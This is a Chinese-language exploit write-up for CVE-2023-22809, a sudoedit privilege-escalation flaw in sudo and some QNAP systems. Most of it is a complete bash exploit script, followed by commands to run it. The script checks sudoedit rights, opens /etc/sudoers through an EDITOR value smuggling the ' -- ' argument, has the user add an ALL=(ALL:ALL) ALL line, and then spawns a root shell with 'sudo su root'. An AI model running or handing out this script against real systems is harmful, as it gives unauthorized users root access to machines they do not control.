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0x01 CVE-2023-22809说明
sudo (su “do”)允许系统管理员将权限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。
由于Sudo中的sudoedit对处理用户提供的环境变量(如SUDO_EDITOR、VISUAL和EDITOR)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过sudoers策略的 ” –” 参数时,拥有sudoedit访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升。除外,该漏洞还影响部分QNAP操作系统:QTS、QuTS hero、QuTScloud、QVP(QVR Pro设备)。
0x02 CVE-2023-22809利用
QTS与QuTS hero:
QTS < build 20230322
QuTS < hero h5.0.1.2348 build 20230324
1.查内核版本,Sudo version 1.9.9,在影响版本内
sudo -V
#!/usr/bin/env bash # Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation # Exploit Author: n3m1.sys # CVE: CVE-2023-22809 # Date: 2023/01/26 # Vendor Homepage: https://www.sudo.ws/ # Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz # Version: 1.8.0 to 1.9.12p1 # Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9 # Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine. # The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the # attacker to add a line to gain privileges on all the files and get a root # shell. if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' then echo "> Currently installed sudo version is not vulnerable" exit 1 fi EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-) if [ -z "$EXPLOITABLE" ]; then echo "> It doesn't seem that this user can run sudoedit as root" read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 else echo "> BINGO! User exploitable" fi echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo "$USER ALL=(ALL:ALL) ALL" read -n 1 -s -r -p "Press any key to continue..." EDITOR="vim -- /etc/sudoers" $EXPLOITABLE sudo su root exit 0
chmod +x getroot.sh ./getroot.sh